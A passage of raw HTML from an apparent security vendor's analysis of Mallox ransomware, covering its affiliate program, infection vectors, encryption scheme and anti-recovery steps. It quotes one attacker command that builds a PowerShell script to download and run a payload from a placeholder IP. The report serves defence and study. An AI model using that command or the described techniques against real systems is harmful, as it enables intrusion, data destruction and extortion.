  675. <tr>
  676. <td width="310">grinder</td>
  677. <td width="116">10</td>
  678. </tr>
  679. <tr>
  680. <td width="310">hiervos</td>
  681. <td width="116">251</td>
  682. </tr>
  683. <tr>
  684. <td width="310">last</td>
  685. <td width="116">1</td>
  686. </tr>
  687. <tr>
  688. <td width="310">lastsmile</td>
  689. <td width="116">2</td>
  690. </tr>
  691. <tr>
  692. <td width="310">leandra56</td>
  693. <td width="116">1</td>
  694. </tr>
  695. <tr>
  696. <td width="310">loader</td>
  697. <td width="116">7</td>
  698. </tr>
  699. <tr>
  700. <td width="310">maestro</td>
  701. <td width="116">170</td>
  702. </tr>
  703. <tr>
  704. <td width="310">mallox</td>
  705. <td width="116">2</td>
  706. </tr>
  707. <tr>
  708. <td width="310">Neuroframe</td>
  709. <td width="116">11</td>
  710. </tr>
  711. <tr>
  712. <td width="310">panda</td>
  713. <td width="116">42</td>
  714. </tr>
  715. <tr>
  716. <td width="310">samuel</td>
  717. <td width="116">13</td>
  718. </tr>
  719. <tr>
  720. <td width="310">truetl</td>
  721. <td width="116">4</td>
  722. </tr>
  723. <tr>
  724. <td width="310">UserHelp</td>
  725. <td width="116">4</td>
  726. </tr>
  727. <tr>
  728. <td width="310">vampir</td>
  729. <td width="116">65</td>
  730. </tr>
  731. </tbody>
  732. </table>
  733. <p>We also analyzed the changes in the distribution of samples across the most active affiliates by year. These changes indicate that after the launch of the RaaS program, it rapidly expanded to reach 16 active affiliates operating 500 samples, and then shrank in the first half of 2024. At the time of writing this post, we observed a total of 19 Mallox RaaS partners.</p>
  734. <p>Also notable is the fact that the original five affiliates that were working with Mallox in 2022 continue to do so in 2024. This might indicate that the core subscribers seem to be satisfied with the program&#8217;s terms and prefer it to other options available on the darknet market.</p>
  735. <p>Please note that at the time of writing this report, the data for 2024 was limited to H1.</p>
  736. <div id="attachment_113628" style="width: 1405px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113628" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02.png" alt="Mallox samples by affiliate ID" width="1395" height="811" class="size-full wp-image-113628" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02.png 1395w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02-300x174.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02-1024x595.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02-768x446.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02-602x350.png 602w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02-740x430.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02-482x280.png 482w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02-800x465.png 800w" sizes="(max-width: 1395px) 100vw, 1395px" /></a><p id="caption-attachment-113628" class="wp-caption-text">Mallox samples by affiliate ID</p></div>
  737. <h2 id="typical-infection-scenario">Typical infection scenario</h2>
  738. <p>Mallox affiliates are free to choose their methods of compromising victims&#8217; networks. Some of the campaigns we observed involved sending spam with malicious attachments. In another <a href="https://www.secrss.com/articles/63100">recent campaign in China</a>, the threat actors allegedly exploited a vulnerability in the IP-Guard software for initial access.</p>
  739. <p>While analyzing KSN telemetry, we determined that one of the most common infection vectors used by the attackers was penetrating internet-facing MS SQL or PostgreSQL servers. To achieve this, the threat actors typically either exploit RCE vulnerabilities, such as <a href="https://www.cve.org/CVERecord?id=CVE-2019-1068">CVE-2019-1068</a> or <a href="https://www.cve.org/CVERecord?id=CVE-2020-0618">CVE-2020-0618</a> in unpatched MS SQL server installations, or carry out brute-force or dictionary attacks.</p>
  740. <div id="attachment_113627" style="width: 1067px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113627" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03.png" alt="Typical Mallox attack pattern" width="1057" height="903" class="size-full wp-image-113627" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03.png 1057w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03-300x256.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03-1024x875.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03-768x656.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03-410x350.png 410w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03-740x632.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03-328x280.png 328w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03-800x683.png 800w" sizes="(max-width: 1057px) 100vw, 1057px" /></a><p id="caption-attachment-113627" class="wp-caption-text">Typical Mallox attack pattern</p></div>
  741. <p>The compromised MS SQL server process executes a command that creates a PowerShell script and launches it using the sqlps command, then starts the first stage portable executable (PE) payload downloaded by the PowerShell script.</p>
  742. <pre class="crayon-plain-tag">cmd.exe /C "echo $cl = New-Object System.Net.WebClient &amp;gt;%APPDATA%\alta.ps1 &amp;amp; echo $cl.DownloadFile("hxxp[:]//&amp;lt;ip address&amp;gt;/scavenger.exe", "%APPDATA%\box.bat") &amp;gt;&amp;gt; %APPDATA%\alta.ps1 &amp;amp; sqlps -ExecutionPolicy Bypass %APPDATA%\alta.ps1  &amp;amp; WMIC process call create "%APPDATA%\box.bat""</pre> </p>
  743. <p>This first-stage PE payload in Mallox attacks is typically either a sample of the Remcos RAT subsequently used by the operators for remote access to the compromised network, or a .NET downloader that automatically fetches the second-stage PE payload, which is the encryption Trojan. The .NET downloaders used in this scheme are mostly simplistic and implement a procedure to download a binary from the hardcoded URL, decrypt it with a XOR loop and execute it in memory.</p>
  744. <h2 id="analysis">Analysis</h2>
  745. <p>Several hundred different samples have been found since the first version of Mallox was discovered. Mallox developers have continued to improve the ransomware and add new features. For convenience, we divided these samples into several different versions. Below, we will perform a detailed analysis of the first and the latest known versions. Moreover, we will provide a comparison table with other known versions to show how the Trojan has evolved, what features have been added and how the cryptographic scheme has changed.</p>
  746. <h3 id="earliest-known-mallox-version-9b772efb921de8f172f21125dd0e0ff7-v1">Earliest known Mallox version (9b772efb921de8f172f21125dd0e0ff7, v1)</h3>
  747. <p>This sample was discovered in mid-May 2021 and is the first discovered executable file belonging to the Mallox ransomware family. It is considered to be the original Mallox version. We have found several samples of this version with various extensions and notes that contain explicit names of the victim organizations. This is one of the few variants of Mallox that support debug logging, which outputs errors and other information about the encryption process to the console. In later versions, the logging functionality was removed or excluded from the release build.</p>
  748. <p>The ransom note left behind by the original Mallox version looks typical of ransomware: it contains a unique victim identifier, conditions for file decryption, a threat to publish stolen data and the address of the negotiators&#8217; website on the Tor network. To demonstrate their ability to decrypt files, the attackers offer to decrypt several test files that do not contain important data. In this version, the victim organization&#8217;s name is explicitly indicated inside the note.</p>
  749. <div id="attachment_113626" style="width: 1076px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113626" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04.png" alt="Mallox ransom note from the original version" width="1066" height="528" class="size-full wp-image-113626" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04.png 1066w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04-300x149.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04-1024x507.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04-768x380.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04-707x350.png 707w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04-740x367.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04-565x280.png 565w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125407/Mallox-ransomware-04-800x396.png 800w" sizes="(max-width: 1066px) 100vw, 1066px" /></a><p id="caption-attachment-113626" class="wp-caption-text">Mallox ransom note from the original version</p></div>
  750. <h4 id="preparing-for-encryption">Preparing for encryption</h4>
  751. <p>Before encrypting files on the device, the ransomware performs several preparatory steps. First, it checks the language settings of the victim&#8217;s operating system. The ransomware immediately terminates if a Russian, Kazakh, Tatar, Belarusian or Ukrainian language identifier is set. Developers of malware typically do this if they hope to avoid prosecution in the countries where the languages are spoken. However, in the <a href="https://www.suspectfile.com/interview-with-mallox-ransomware-group/">interview</a> published in January 2023, a Mallox representative said of these restrictions, &#8220;This is due to the developer&#8217;s own decision to restrict our operations in those regions. We have no prejudices or preferences in which countries to work&#8221;. In the same interview, they claim that the project&#8217;s code previously had been used by other ransomware groups and subsequently purchased by the current threat actors. This means that early samples may not be linked to the current owners of Mallox, or that several independent groups may be using these.</p>
  752. <div id="attachment_113625" style="width: 1243px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113625" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05.png" alt="Mallox main function" width="1233" height="964" class="size-full wp-image-113625" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05.png 1233w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05-300x235.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05-1024x801.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05-768x600.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05-448x350.png 448w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05-740x579.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05-358x280.png 358w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125349/Mallox-ransomware-05-800x625.png 800w" sizes="(max-width: 1233px) 100vw, 1233px" /></a><p id="caption-attachment-113625" class="wp-caption-text">Mallox main function</p></div>
  753. <p>If the default language of the operating system is not on the exclusion list, the ransomware process obtains the SeTakeOwnershipPrivilege and SeDebugPrivilege privileges. Next, it removes the keys and values from the registry using the WinAPI function SHDeleteKeyW, apparently to counter system defenses.</p>
  754. <p>After that, Mallox deletes the shadow copies using the vssadmin.exe utility and completely disables Windows Recovery Environment.</p>
  755. <h4 id="drives-enumeration-and-exclusions">Drives enumeration and exclusions</h4>
  756. <p>Mallox encrypts data on all drives from A through Z if these have the following types: DRIVE_REMOTE, DRIVE_REMOVABLE or DRIVE_FIXED. It also supports text files containing paths for encryption via the command-line arguments, such as &#8220;-p&#8221; and &#8220;-d&#8221;. If the argument &#8220;-d &lt;text_file_path&gt;&#8221; is set, the ransomware encrypts only the paths in the text file and does not encrypt the device&#8217;s drives recursively. If the argument &#8220;-p &lt;text_file_path&gt;&#8221; is set, it first encrypts the paths in the text file and only then, the data on local drives. The full list of file path arguments accepted by the original version of Mallox is provided below.</p>
  757. <table width="715">
  758. <tbody>
  759. <tr>
  760. <td width="83"><strong>Argument</strong></td>
  761. <td width="632"><strong>Description</strong></td>
  762. </tr>
  763. <tr>
  764. <td width="83">-d &lt;path&gt;</td>
  765. <td width="632">Expects a path to the text file, encrypts only the paths in the file.</td>
  766. </tr>
  767. <tr>
  768. <td width="83">-p &lt;path&gt;</td>
  769. <td width="632">Expects a path to the text file, first encrypts the paths in the file and only then the drives.</td>
  770. </tr>
  771. <tr>
  772. <td width="83">-l &lt;path&gt;</td>
  773. <td width="632">Expects a path to the text file. It was not noticed that it affected anything.</td>
  774. </tr>
  775. </tbody>
  776. </table>
  777. <p>To calculate the count of threads that will be used to encrypt files, Mallox uses the WinAPI function GetSystemInfo. It gets the dwNumberOfProcessors value from this function and doubles it. However, the count of threads is limited to 64 and cannot exceed this value.</p>
  778. <p>Mallox supports allowlist functionality. Lists of extensions, folder names and file names which must not be encrypted are embedded into the ransomware. The folder names include the names of the operating system folders and certain widely known applications. One of the interesting names among the exception files is &#8220;debugLog.txt&#8221;, which is presumably used for debugging purposes.</p>
  779. <p>Below is pseudocode for iterating through drives, which is done if the &#8220;-d&#8221; argument is not set. The code shows that Mallox can use two different directory and file iterating methods: manual NTFS parsing and File Management Functions (WinAPI).</p>
  780. <div id="attachment_113624" style="width: 1293px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113624" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06.png" alt="Drive search code for encryption" width="1283" height="1352" class="size-full wp-image-113624" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06.png 1283w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06-285x300.png 285w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06-972x1024.png 972w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06-768x809.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06-332x350.png 332w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06-740x780.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06-266x280.png 266w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125329/Mallox-ransomware-06-800x843.png 800w" sizes="(max-width: 1283px) 100vw, 1283px" /></a><p id="caption-attachment-113624" class="wp-caption-text">Drive search code for encryption</p></div>
  781. <h4 id="cryptography">Cryptography</h4>
  782. <p>Mallox implements a convoluted encryption scheme consisting of several cryptographic algorithms.</p>
  783. <p>Every time Mallox starts, it generates a new user private ECC (elliptic curve) key to be used with ECDH (Elliptic-curve Diffie–Hellman key agreement protocol on the <a href="https://en.wikipedia.org/wiki/Curve25519">Curve25519</a>). To generate this private key, the ransomware uses the pseudorandom number generator <a href="https://en.wikipedia.org/wiki/Mersenne_Twister">Mersenne Twister</a>, the seed for which is generated using the WinAPI function CryptGenRandom. If there are problems with initializing the Cryptographic Service Provider (CryptGenRandom cannot be used), then the seed is generated via a set of functions: QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, and the __rdtsc instruction. The outputs of these functions are multiplied and used as a Mersenne Twister seed.</p>
  784. <div id="attachment_113623" style="width: 929px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113623" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07.png" alt="Mersenne Twister seed generation" width="919" height="320" class="size-full wp-image-113623" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07.png 919w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07-300x104.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07-768x267.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07-740x258.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07-804x280.png 804w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125309/Mallox-ransomware-07-800x279.png 800w" sizes="(max-width: 919px) 100vw, 919px" /></a><p id="caption-attachment-113623" class="wp-caption-text">Mersenne Twister seed generation</p></div>
  785. <p>The generated ECC private key is 32 bytes in size. From this private key, the Trojan generates a corresponding user ECC public key. The Trojan then calculates a shared secret using the Elliptic-curve Diffie–Hellman key agreement protocol (ECDH) from the user ECC private key and the attacker&#8217;s master ECC public key that is hardcoded in the Trojan&#8217;s body. The user ECC private key is not stored anywhere, and the user ECC public key is added to each encrypted file and is necessary for attackers to recalculate the shared secret.</p>
  786. <p>In the picture below, the first call to the curve25519 function generates a user public key, and the next call generates a shared key, which is then hashed with SHA-256.</p>
  787. <div id="attachment_113622" style="width: 769px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125253/Mallox-ransomware-08.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113622" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125253/Mallox-ransomware-08.png" alt="Code for generating a shared secret" width="759" height="388" class="size-full wp-image-113622" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125253/Mallox-ransomware-08.png 759w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125253/Mallox-ransomware-08-300x153.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125253/Mallox-ransomware-08-685x350.png 685w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125253/Mallox-ransomware-08-740x378.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125253/Mallox-ransomware-08-548x280.png 548w" sizes="(max-width: 759px) 100vw, 759px" /></a><p id="caption-attachment-113622" class="wp-caption-text">Code for generating a shared secret</p></div>
  788. <p>The first six bytes of the user ECC public key in hexadecimal form are used as the unique identifier of the victim, referred to as &#8220;personal identifier&#8221; in the note. It is generated uniquely each time the ransomware starts and does not depend on the device, so the identifier will change with each new run.</p>
  789. <p>Files that are not on the allowlists are encrypted with the ChaCha20 stream cipher. The file key and nonce for ChaCha are encrypted using the symmetric encryption algorithm AES-128 in CTR mode. The key for AES is the first half of the SHA-256 hash of the shared secret obtained previously by using the ECDH protocol.</p>
  790. <p>Files smaller than or equal to 10240 bytes are encrypted in their entirety. Larger files are encrypted using a stripe method: the file is broken down into 100 pieces, each further divided into 100 chunks. Each of the resulting chunks is encrypted with ChaCha. If the chunk size is less than 4096 bytes, the malware expands its size to 4096 bytes prior to encryption.</p>
  791. <p>At the end of each encrypted file, Mallox appends a structure we will designate as a &#8220;technical buffer&#8221;, which stores the information necessary to decrypt the file. The Mallox sample in question has a minimalistic buffer that contains only an encrypted key and nonce for ChaCha, IV for AES, and the user&#8217;s ECC public key. The latter is intended to be used by attackers to recover the shared secret and calculate its SHA-256 hash, the first half of which is the encryption key for AES-128 CTR, and, along with IV, is necessary to decrypt the ChaCha key and nonce.</p>
  792. <p>In the picture below, the ChaCha key and nonce are shown in red, AES CTR in blue, and the public user ECC key in orange.</p>
  793. <div id="attachment_113621" style="width: 1217px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113621" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09.png" alt="Technical buffer structure saved at the end of the file" width="1207" height="270" class="size-full wp-image-113621" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09.png 1207w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09-300x67.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09-1024x229.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09-768x172.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09-740x166.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125242/Mallox-ransomware-09-800x179.png 800w" sizes="(max-width: 1207px) 100vw, 1207px" /></a><p id="caption-attachment-113621" class="wp-caption-text">&#8220;Technical buffer&#8221; structure saved at the end of the file</p></div>
  794. <p>After the encryption is complete, the executable file is deleted via the &#8220;del&#8221; command.</p>
  795. <h4 id="communication-with-the-attackers-cc-server">Communication with the attackers&#8217; C&amp;C server</h4>
  796. <p>Before starting the file encryption process starts, Mallox sends the following information about the infected device to the attacker&#8217;s server using an HTTP POST request: the victim&#8217;s unique identifier obtained from the public key, the local computer name and the DNS name of the primary domain determined via a call to LsaQueryInformationPolicy with the PolicyDnsDomainInformation parameter.</p>
  797. <div id="attachment_113620" style="width: 1171px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113620" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10.png" alt="Code to send an HTTP request" width="1161" height="209" class="size-full wp-image-113620" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10.png 1161w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10-300x54.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10-1024x184.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10-768x138.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10-740x133.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125225/Mallox-ransomware-10-800x144.png 800w" sizes="(max-width: 1161px) 100vw, 1161px" /></a><p id="caption-attachment-113620" class="wp-caption-text">Code to send an HTTP request</p></div>
  798. <p>After the encryption is completed, the ransomware sends a request to the attacker&#8217;s server again, with the victim&#8217;s ID and information about the encrypted disks.</p>
  799. <h3 id="recent-mallox-version-e98b3a8d2179e0bd0bebba42735d11b7-v12">Recent Mallox version (e98b3a8d2179e0bd0bebba42735d11b7, v12)</h3>
  800. <p>This is one of the most recent versions of the Mallox ransomware, found in March 2024. Below, we provide an analysis of this version, but the main purpose of the analysis is to show the difference between the first and the recent versions.</p>
  801. <p>Compared to the original version of Mallox, one of the significant changes that occurred in later versions concerned the format of the note. The original version explicitly showed the name of the attacked company and device, but later versions more often had a generic note and extensions.</p>
  802. <div id="attachment_113648" style="width: 1558px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113648" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23.png" alt="Generic ransom note" width="1548" height="657" class="size-full wp-image-113648" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23.png 1548w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-300x127.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-1024x435.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-768x326.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-1536x652.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-825x350.png 825w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-740x314.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-660x280.png 660w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30132726/Mallox-ransomware-23-800x340.png 800w" sizes="(max-width: 1548px) 100vw, 1548px" /></a><p id="caption-attachment-113648" class="wp-caption-text">Generic ransom note</p></div>
  803. <h4 id="new-arguments">New arguments</h4>
  804. <table width="705">
  805. <tbody>
  806. <tr>
  807. <td width="140"><strong>Argument</strong></td>
  808. <td width="565"><strong>Description</strong></td>
  809. </tr>
  810. <tr>
  811. <td width="140">-path &lt;path&gt;</td>
  812. <td width="565">Does not work in this version. Expects a path to encrypt.</td>
  813. </tr>
  814. <tr>
  815. <td width="140">-queue &lt;integer&gt;</td>
  816. <td width="565">Does not work in this version. Expects an integer value.</td>
  817. </tr>
  818. </tbody>
  819. </table>
  820. <p>Two new arguments have been added compared to the first version, but none of the new or old arguments work in this variant. Any arguments passed via the command line are in fact checked for existence through the PathFileExistsW function, so the ransomware apparently only accepts file paths as arguments: &#8220;mallox.exe &lt;path1&gt; &lt;path2&gt;&#8230;. &lt;pathN&gt;&#8221;.</p>
  821. <p>Any arguments that are not paths, including &#8220;-p&#8221;, &#8220;-d&#8221;, &#8220;-l&#8221;, &#8220;-path&#8221;, &#8220;-queue&#8221;, result in an error. If the correct paths are passed, the ransomware checks whether it is running with administrative privileges and, if so, it encrypts the files at these paths. If running without administrator permissions, it attempts to elevate its privileges by restarting using ShellExecuteW with <a href="https://learn.microsoft.com/en-us/windows/win32/shell/launch#object-verbs">the verb</a> runas, used to run the application as the administrator.</p>
  822. <h4 id="preparing-for-encryption">Preparing for encryption</h4>
  823. <p>Mallox sets the computer&#8217;s power scheme to High Performance, obviously in order to increase the performance and speed of the encryption process.</p>
  824. <div id="attachment_113619" style="width: 1211px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113619" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11.png" alt="Pseudocode to change the power scheme" width="1201" height="328" class="size-full wp-image-113619" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11.png 1201w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11-300x82.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11-1024x280.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11-768x210.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11-740x202.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11-1025x280.png 1025w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125208/Mallox-ransomware-11-800x218.png 800w" sizes="(max-width: 1201px) 100vw, 1201px" /></a><p id="caption-attachment-113619" class="wp-caption-text">Pseudocode to change the power scheme</p></div>
  825. <p>In this version, the Trojan contains a new function for terminating active processes via the TerminateProcess WinAPI function so as to keep them from blocking user files or interfering with the encryption process. The list of terminable process names refers mainly to databases, such as SQL Server, Oracle Database, Pervasive PSQL and MySQL.</p>
  826. <p>Another new feature concerns services: the Trojan uses the Service Control Manager to disable and stop services using the ChangeServiceConfig and ControlService functions.</p>
  827. <p>If the user tries to shut down or restart the operating system, Mallox attempts to prevent this. Using the ShutdownBlockReasonCreate function, the ransomware makes the OS display a threatening message about the possibility of file damage unless the user aborts the shutdown or reboot.</p>
